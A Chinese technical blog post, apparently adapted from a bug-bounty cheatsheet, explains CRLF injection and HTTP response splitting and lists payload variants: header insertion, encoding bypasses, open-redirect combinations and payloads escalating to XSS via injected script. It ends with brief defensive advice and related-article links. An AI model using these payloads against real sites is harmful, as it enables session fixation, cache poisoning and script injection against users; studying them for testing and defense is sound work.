深入解析CRLF注入技术:从基础到实战

于 2025-06-07 09:02:04 发布
阅读量414 收藏 5
点赞数 5
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/gitblog_00690/article/details/148487496

深入解析CRLF注入技术:从基础到实战

bugbounty-cheatsheet A list of interesting payloads, tips and tricks for bug bounty hunters. bugbounty-cheatsheet 项目地址: https://gitcode.com/gh_mirrors/bu/bugbounty-cheatsheet

什么是CRLF注入技术

CRLF(Carriage Return Line Feed)注入技术,也称为HTTP响应拆分技术,是一种利用Web应用程序对用户输入处理不当的技术。CRLF指的是回车(Carriage Return,%0d)和换行(Line Feed,%0a)这两个特殊字符,它们在HTTP协议中用于分隔头部字段。

当Web应用程序未能正确过滤用户输入中的这些特殊字符时,可能会被利用来插入特定内容到HTTP响应中,可能导致会话固定、跨站脚本(XSS)、缓存投毒等多种安全问题。

CRLF注入技术的基本原理

HTTP协议使用CRLF(%0d%0a)来分隔头部字段和响应体。例如一个正常的HTTP响应可能如下:

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: sessionid=12345

<html>...</html>

如果能够控制部分响应内容,并插入CRLF字符,就可以添加额外的HTTP头部或修改响应体。

常见CRLF注入方法

基础注入测试

最简单的测试方法是尝试插入CRLF字符并添加自定义头部:

%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;

头部插入测试

以下是多种变体的头部插入测试方法,适用于不同场景:

%0d%0aheader:header
%0aheader:header
%0dheader:header
%23%0dheader:header
%3f%0dheader:header

编码绕过技术

为了绕过某些过滤机制,会使用各种编码方式:

/%250aheader:header
/%25250aheader:header
/%%0a0aheader:header
/%3f%0dheader:header
/%23%0dheader:header
/%25%30aheader:header
/%25%30%61header:header
/%u000aheader:header

高级技术应用

CRLF与开放重定向结合

在某些配置不当的服务器上,可以将CRLF插入与开放重定向问题结合:

//www.google.com/%2f%2e%2e%0d%0aheader:header
/www.google.com/%2e%2e%2f%0d%0aheader:header
/google.com/%2F..%0d%0aheader:header

特定平台的CRLF插入

某些平台对特殊字符的处理方式不同,例如Twitter曾受影响的特殊插入方式:

%E5%98%8A%E5%98%8Dheader:header

CRLF插入升级为XSS

通过精心构造的CRLF插入,可以实现XSS:

%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e

302重定向中的响应拆分

在302重定向前插入特定内容:

%0d%0aContent-Type:%20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3E

301状态码的CRLF插入

利用301重定向修改Location头部:

%2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a%3cscript%3ealert(document.cookie)%3c/script%3e%2F..%2F..%2F..%2F../tr

防护建议

  1. 对所有用户输入进行严格的验证和过滤
  2. 移除或转义CR(%0d)和LF(%0a)字符
  3. 使用安全的API处理HTTP头部设置
  4. 实施内容安全策略(CSP)
  5. 定期进行安全审计和渗透测试

总结

CRLF插入是一种需要重视的Web技术问题。通过理解其原理和各种变体,开发人员可以更有效地防范此类问题。本文提供的技术细节和方法可作为技术研究的参考,但请务必在合法授权范围内使用这些技术。

bugbounty-cheatsheet A list of interesting payloads, tips and tricks for bug bounty hunters. bugbounty-cheatsheet 项目地址: https://gitcode.com/gh_mirrors/bu/bugbounty-cheatsheet

创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考

CRLF注入(HTTP响应拆分-截断),2024年最新阿里P8大佬亲自讲解
2401_83946826的博客
04-15 888
首先说说什么是会话固定攻击,会话固定攻击(session fixation attack)是利用应用系统在服务器的会话ID固定不变机制,借助他人用相同的会话ID获取认证和授权,然后利用该会话ID劫持他人的会话以成功冒充他人,造成会话固定攻击。测试的用例大家可能会觉得这漏洞没什么危害性,但试想一下:利用漏洞,注入一个CRLF控制用户的Cookie,或者注入两个CRLF,控制返回给客户端的主体,该漏洞的危害不亚于XSS。根据插入的CRLF的个数不同,可设置任意的响应头,控制响应正文两个主要的利用办法。
CRLF注入(HTTP响应拆分-截断)
m0_51468027的博客
03-27 5354
2023年HW厂商斗象面试题——CRLF注入
crlf注入,url重定向,Web 拒绝服务
最新发布
m0_74849202的博客
04-30 313
正常网站A,钓鱼网站B,攻击者利用A的URL重定向漏洞,把A重定向到B,再发送链接给受害者,受害者一看url看起来像是网站A,点击进去实际上跳转到了网站B,再把网站B界面做的跟网站A一模一样,就可以盗取受害者的信息。现在有许多资源是由服务器生成然后返回给客户端的,而此类“资源生成”接口如若有参数可以被客户端控制(可控),并没有做任何资源生成大小限制,这样就会导致服务器处理不过来或占用资源去处理。钓鱼网站制作,网站url上如果有跳转远程地址的参数,就可以修改来使网站重新加载到新的地址。
Web渗透(一)CRLF注入简介
weixin_39157582的博客
08-21 6502
CRLF注入简介1、基础知识2、原理分析3、漏洞挖掘4、防御手段5、CRLF Payload: 1、基础知识 HTTP报文结构 从上图可以看到:HTTP报文由三部分组成:状态行、首部、主体。 可以看到状态行和首部中的每行都是以回车符(\r,%0d,CR)和换行符(\n,%0a,LF)结束。 十六进制编码分别为0x0d和0x0a,URL编码为%0D和%0A 这是因为HTTP规范中行应该使用CRLF结束。另外,首部和主体由两个CRLF分隔。 2、原理分析 CRLF是 “ 回车+换行 ”(\r\n)的简称。
CRLF 注入漏洞原理以及修复方法
it知识分享 free for nothing..
01-29 1359
CRLF 注入漏洞原理以及修复方法
CRLF注入与检测
无痕的博客
01-03 3232
CRLF注入漏洞的介绍与检测
CRLF注入攻击学习笔记
darkb1rd的博客
04-12 698
CR(回车符 \r,ASCII 13):将光标移动到当前行的开始位置LF(换行符 \n,ASCII 10):将光标移动到下一行这两个字符在HTTP协议中具有特殊的意义,它们共同构成了HTTP头部字段之间的分隔符。
CRLF注入(HTTP响应拆分-截断)(1)
2401_84253894的博客
04-26 794
v=b3;
Masm网络编程:基础到进阶的全面掌握
参考资源链接:[Masm for Windows集成环境:从入门到调试教程](https://wenku.youkuaiyun.com/doc/539zgu799c?spm=1055.2635.3001.10343) # 1. 网络编程基础概念与Masm简介 网络编程是计算机科学的一个分支,涉及跨网络的...
【XSS攻击实战应用】:防御技术在XSS-labs中的终极应用
本文深入探讨了跨站脚本攻击(XSS)的原理、分类及其防御技术。首先介绍了XSS攻击的基本原理和主要分类,然后详细阐述了包括输入验证、输出编码、HTTP头部和cookie安全,以及Web应用防火墙(WAF)在内的多种防御策略...
C#网络编程揭秘:从零开始实现HTTP请求与高级交互
本文详细探讨了C#网络编程的基础、HTTP协议的深入理解、网络编程实践、HTTP客户端的高级交互以及网络安全问题与防范,并展望了未来发展趋势。首先介绍了C#网络编程的基本概念,随后深入剖析了HTTP协议的请求响应机制...
WEB攻防-通用漏洞&CRLF注入&URL重定向&资源处理拒绝服务
SuperherRo的博客
12-04 2069
#知识点: 1、CRLF注入-原理&检测&利用 2、URL重定向-原理&检测&利用 3、Web拒绝服务-原理&检测&利用
渗透测试-crlf注入原理
lza20001103的博客
12-16 2780
渗透测试-crlf注入原理
CRLF注入漏洞(响应截断)攻击实战
热门推荐
12-28 1万+
CRLF是CR和LF两个字符的拼接,它们分别代表”回车+换行”(\r\n)。CRLF可以深度利用,造成反射型XSS攻击,会话固定等漏洞。CRLF造成XSS漏洞。
CRLF注入漏洞、URL重定向、资源处理拒绝服务详细介绍(附实例)
ran的博客
04-26 4873
1.随便访问一个页面,这里以baidu.com为例。2.将其数据包复制一部分出来。3. 当我们在url的后面加上/search时,数据包内的GET后也会对应增加。4.当我们在其后面加入换行的符号,然后再加上host=www.xiaodi8.com,数据包下面就会多出来一行内容。5.那么此时就可能会将数据包里host标识后面的值给覆盖获取取代掉,此时就可能会发生重定向。6.这种漏洞很容易进行检测。
CRLF注入原理
墨痕诉清风的博客
12-02 3296
CRLF 指的是回车符(CR,ASCII 13,\r,%0d) 和换行符(LF,ASCII 10,\n,%0a),操作系统就是根据这个标识来进行换行的,你在键盘输入回车键就是输出这个字符,只不过win和linux系统采用的标识不一样而已。
浅谈“CRLF注入
→_→
05-09 2663
漏洞名称: http response splitting attack ,HTTP响应头拆分漏洞 描述: HTTP响应头拆分漏洞(CRLF)”是一种新型的web攻击方案,它重新产生了很多安全漏洞包括:web缓存感染、用户信息涂改、窃取敏感用户页面、跨站脚本漏洞。这项攻击方案,包括其衍生的一系列技术产生,是由于web应用程序没有对用户的提交进行严格过滤,导致非法用户可以提交一些恶意字符,更具体来说,是对用户输入的CR 和LF字符没有进行严格的过滤。CRLF是”回车 + 换行”(\r\n)的简称。
常见的网络攻击形式-CRLF注入
xuesaikao的博客
02-12 624
CR和LF是特殊字符(分别为ASCII 13和10,也称为\r \n),用于表示行尾(EOL)。CRLF注入是漏洞,攻击者可以将CR(回车,ASCII 13)和LF(换行,ASCII 10)字符注入Web应用程序。传统信息交流媒体只能单向地传播信息,而多媒体技术实现了人与系统的交流,可以对系统的多媒体处理功能进行控制,具有了机()功能。1、()越高,所包含的像素就越多,图像就越清晰,印刷的质量也就越好。下列对信息系统安全造成危害的因素中,不属于自然因素的是()。SMTP和PoP3分别是()邮件的协议。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

范轩锦

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值